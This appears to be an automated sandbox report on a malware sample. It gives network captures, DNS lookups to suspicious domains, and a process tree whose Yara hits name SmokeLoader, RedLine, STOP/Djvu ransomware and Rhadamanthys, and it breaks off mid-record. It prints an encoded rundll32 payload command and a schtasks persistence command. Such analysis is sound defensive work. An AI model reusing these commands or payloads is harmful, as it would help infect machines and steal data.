Jan 25, 2023 09:42:40.614464998 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.626651049 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.626651049 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.643986940 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.644038916 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.706640005 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.706765890 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.706834078 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.706881046 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.706888914 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.706928015 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.706935883 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.706974030 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.707020998 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.707029104 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.707067013 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.707113028 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.707168102 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.707355976 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.707406044 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.707415104 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.707477093 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.707515955 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.707545996 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.752640963 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.752695084 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.752752066 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.752805948 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.752823114 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.752861977 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.752865076 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.752902031 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.752919912 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.753530979 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.753582001 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.753599882 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.753628969 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.753679037 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.753680944 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.754316092 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.754370928 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.754385948 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.754415989 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.754462957 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.754463911 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.755188942 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.755243063 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.755259037 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.755290031 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.755337000 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.755340099 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.756964922 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.757025003 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.757040024 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.757072926 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.757118940 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.757127047 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.757163048 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.757208109 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.757211924 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.757247925 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.757294893 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.799654961 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.799721003 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.799767971 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.799813986 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.799815893 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.799877882 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.799981117 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.800026894 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.800076008 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.800244093 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.800288916 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.800348043 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.800818920 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.800865889 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.800913095 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.800915956 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.800961971 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.801004887 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.801335096 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.801382065 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.801423073 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.801435947 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.801875114 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.801918030 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.801923990 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.801973104 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.802012920 CET	49728	80	192.168.2.3	188.114.97.3
Jan 25, 2023 09:42:40.802020073 CET	80	49728	188.114.97.3	192.168.2.3
Jan 25, 2023 09:42:40.802566051 CET	80	49728	188.114.97.3	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2023 09:42:40.423273087 CET	52387	53	192.168.2.3	8.8.8.8
Jan 25, 2023 09:42:40.444751024 CET	53	52387	8.8.8.8	192.168.2.3
Jan 25, 2023 09:42:51.505464077 CET	60625	53	192.168.2.3	8.8.8.8
Jan 25, 2023 09:42:51.526386976 CET	53	60625	8.8.8.8	192.168.2.3
Jan 25, 2023 09:42:54.005945921 CET	49302	53	192.168.2.3	8.8.8.8
Jan 25, 2023 09:42:54.027677059 CET	53	49302	8.8.8.8	192.168.2.3
Jan 25, 2023 09:44:45.958540916 CET	56042	53	192.168.2.3	8.8.8.8
Jan 25, 2023 09:44:45.976910114 CET	53	56042	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 25, 2023 09:42:40.423273087 CET	192.168.2.3	8.8.8.8	0x660e	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:42:51.505464077 CET	192.168.2.3	8.8.8.8	0x75b7	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:42:54.005945921 CET	192.168.2.3	8.8.8.8	0xecc7	Standard query (0)	gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:44:45.958540916 CET	192.168.2.3	8.8.8.8	0x10	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 25, 2023 09:42:40.444751024 CET	8.8.8.8	192.168.2.3	0x660e	No error (0)	potunulit.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:42:40.444751024 CET	8.8.8.8	192.168.2.3	0x660e	No error (0)	potunulit.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:42:51.526386976 CET	8.8.8.8	192.168.2.3	0x75b7	No error (0)	api.2ip.ua		162.0.217.254	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:42:54.027677059 CET	8.8.8.8	192.168.2.3	0xecc7	Name error (3)	gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s	none	none	A (IP address)	IN (0x0001)	false
Jan 25, 2023 09:44:45.976910114 CET	8.8.8.8	192.168.2.3	0x10	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.2ip.ua

transfer.sh

dipcj.net

potunulit.org

pdujeftq.com

lmkympntg.net

khpcnlkw.net

avuxv.net

hdmcxxriay.org

mgqyrb.net

efxdannslj.org

scyxiteu.org

opfakis.org

ntishu.org

biwrdybrv.net

109.206.243.168

Target ID:	0
Start time:	09:41:59
Start date:	25/01/2023
Path:	C:\Users\user\Desktop\aw9Ynwqd1x.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\aw9Ynwqd1x.exe
Imagebase:	0x400000
File size:	199680 bytes
MD5 hash:	B5C3C3D5EB5E6B5415AC4D87E3C46850
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.291031913.0000000004931000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.291031913.0000000004931000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.290704860.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.290704860.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.290595055.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.290961017.0000000002C60000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Analysis Process: explorer.exePID: 3452, Parent PID: 1536

General

Target ID:	1
Start time:	09:42:08
Start date:	25/01/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: dbjigstPID: 996, Parent PID: 1080

General

Target ID:	13
Start time:	09:42:40
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Roaming\dbjigst
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\dbjigst
Imagebase:	0x400000
File size:	199680 bytes
MD5 hash:	B5C3C3D5EB5E6B5415AC4D87E3C46850
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000D.00000002.402603602.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.402735340.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.402735340.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.403103692.0000000002C80000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 85%, ReversingLabs
Reputation:	low

Analysis Process: 336E.exePID: 1568, Parent PID: 3452

General

Target ID:	14
Start time:	09:42:41
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Local\Temp\336E.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\336E.exe
Imagebase:	0x400000
File size:	417792 bytes
MD5 hash:	261B1DB94CCF4266128E2EB71A80FDA4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000E.00000002.577154071.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.577358269.0000000000678000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs
Reputation:	moderate

Analysis Process: 2560.exePID: 2136, Parent PID: 3452

General

Target ID:	15
Start time:	09:42:43
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Local\Temp\2560.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\2560.exe
Imagebase:	0x400000
File size:	718848 bytes
MD5 hash:	0A006808F7AA017CAF2DF9CE9E2B55A2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.361737434.0000000002EA1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 67%, ReversingLabs
Reputation:	moderate

Analysis Process: 226F.exePID: 5992, Parent PID: 3452

General

Target ID:	16
Start time:	09:42:48
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Local\Temp\226F.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\226F.exe
Imagebase:	0xff0000
File size:	1642648 bytes
MD5 hash:	EA25CE2F3580AF1DD771BAC5B0D2BF83
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000003.367401202.000000000D030000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000010.00000003.367401202.000000000D030000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000003.469890360.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000002.479891077.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000003.369928370.000000000D032000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 43%, ReversingLabs Detection: 39%, Virustotal, Browse
Reputation:	moderate

Analysis Process: 2560.exePID: 3152, Parent PID: 2136

General

Target ID:	17
Start time:	09:42:48
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Local\Temp\2560.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\2560.exe
Imagebase:	0x400000
File size:	718848 bytes
MD5 hash:	0A006808F7AA017CAF2DF9CE9E2B55A2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate

Analysis Process: ngentask.exePID: 816, Parent PID: 5992

General

Target ID:	18
Start time:	09:42:56
Start date:	25/01/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Imagebase:	0xfc0000
File size:	85096 bytes
MD5 hash:	ED7F195F7121781CC3D380942765B57D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.456297712.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: fontview.exePID: 4020, Parent PID: 5992

General

Target ID:	19
Start time:	09:42:58
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\fontview.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SYSWOW64\fontview.exe
Imagebase:	0xa60000
File size:	114176 bytes
MD5 hash:	218D53564FB0DD0CAFBBF871641E70F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.386704960.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.387503810.00000000055A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: rundll32.exePID: 5980, Parent PID: 4020

General

Target ID:	24
Start time:	09:43:39
Start date:	25/01/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dll",PrintUIEntry \|5CQkOhmAAAA\|1TKr5GsMwYD\|67sDqg8OAAl\|xYmwxC0TNSO\|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8\|AtBQPz8FP\|AFoAeQBPAGL7AEEnAEMAaAA3\|wBVAEsAZwBJ\|i0CWUiD7CjoBP8CAABIg8Qow\|\|MzMxMiUQkGP9IiVQkEEiJTPskCF0BSItEJDBvSIkEJIEBOEhvAL8ISMdEJBAtAet9DoEBEEiDwAGPAd0QgQFASDmWAHMl\|p8DiwwkSAPISF+LwUiLTKsBVHsA\|wPRSIvKigmI9wjrwWYFZUiLBPslYPPwM8lIi1D\|GEg70XQ2SIP\|wiBIiwJIO8L\|dCpmg3hIGHX\|GkyLQFBmQYPvOGt0BxERS3UI\|hEQeBAudAVIi78A69VIi0j9AMH+agBAU1VWV0FUv0FVQVZBV10BZv+BOU1aTYv4TP+L8kiL2Q+F\|P7z8ExjSTxBgTz\|CVBFAAAPheq+8\|BBi4QJiPPwhf\|ASI08AQ+E1t5qEYO8CYwtAQ+E\|cfz8ESLZyBEi\|9fHIt3JESLT\|8YTAPhTAPZSP8D8TPJRYXJD\|uEpPPwTYvEQYv\|EEUz0kgD04r\|AoTAdB1BwcrvDQ++wPoAAUQD\|dC\|EXXsQYH6qv\|8DXx0DoPBAf9Jg8AEQTvJc\|9p68aLwQ+3DP9ORYssi0wD6+90WDPtqhB0UUH7ixTBANMzyYoCf0yLwusPwcnIEXsDyOUQAUGKANUQ\|+0zwDP2QTsM+bbgEKYAg8YBg\|j\|CHLu6wpIi8v\|Qf\|VSYkE94P9xeQQxAQ7bxhy\|a9mAUFfQV5BXb9BXF9eXVszF0jvgexgAWQAi+no\|2b+\|\|9IhcAPW4SYdSBMja8BiysQ38gz\|+ibfSCNX\|8ETI1FRjPSi9\|L\|1QkaIAgTIuv4A+Ea3UgRagQM\|fAi9ORIEiJfCT1IKYgcIAgSIvwD\|OES3UgpiBQSI1W\|whEjUdASI2M\|SSFEUiL2Oh8\|a5+II1WSN4gEOIhzPbz8Ohn7yBEiwaN01cIQSCmIFjKIYmEaySAhxLe8\|CLDtogj1iJjCRxEQcwkSDo7THvIIucLTJMi12\|OkiD+2xIiiAw\|0yJZCQ4TIuk7hoyTIlchAGEJNy2hxGGko0RjUdLMIz7JPDz8EmL1Ojp7fwFMIqceDJIjYT+eDJBgPMhjU9s90QwGKQCg+kBdffzgbx4MiFSZXi\|dU2LhCT0IjGU+yT4NQHCSDvYcv84g\|psdjNEjXtJQPoAlEG4AJgAeqYgQMoi+HQZRLYwvsAxSY1UJGyRIEnfg+hs6GuCMEiL\|c6mIHhIhf90Es+LVUJMjjAbMUiN\|0wkQP\|XSIHEAHQhYSQtCC0B
Imagebase:	0x7ff6c5de0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000003.635769063.000002275D541000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000003.517892986.000002275DAB3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000003.465106371.000002275D66D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000003.463672074.000002275D472000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000003.519715452.000002275DCB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000003.480168588.000002275D6F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000003.478098878.000002275D46D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Analysis Process: dllhost.exePID: 4924, Parent PID: 5980

General

Target ID:	25
Start time:	09:44:10
Start date:	25/01/2023
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\dllhost.exe
Imagebase:	0x7ff769260000
File size:	20888 bytes
MD5 hash:	2528137C6745C4EADD87817A1909677E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000003.535647654.0000019D88EF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Analysis Process: schtasks.exePID: 3680, Parent PID: 1568

General

Target ID:	32
Start time:	09:44:32
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Imagebase:	0x8e0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 5080, Parent PID: 3680

General

Target ID:	33
Start time:	09:44:33
Start date:	25/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: svcupdater.exePID: 5684, Parent PID: 1080

General

Target ID:	35
Start time:	09:44:46
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
Imagebase:	0x400000
File size:	752246784 bytes
MD5 hash:	A4C9D357EA9C7679D978EB985F61E6C5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: Library.exePID: 4500, Parent PID: 4924

General

Target ID:	36
Start time:	09:44:48
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Local\Temp\Library.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\Library.exe"
Imagebase:	0xa20000
File size:	3162624 bytes
MD5 hash:	EC5A11FC9A9CB3111AFA460FEC201D3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML

Analysis Process: WerFault.exePID: 3304, Parent PID: 5980

General

Target ID:	40
Start time:	09:45:01
Start date:	25/01/2023
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5980 -s 648
Imagebase:	0x7ff679980000
File size:	494488 bytes
MD5 hash:	2AFFE478D86272288BBEF5A00BBEF6A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: svcupdater.exePID: 2636, Parent PID: 1080

General

Target ID:	41
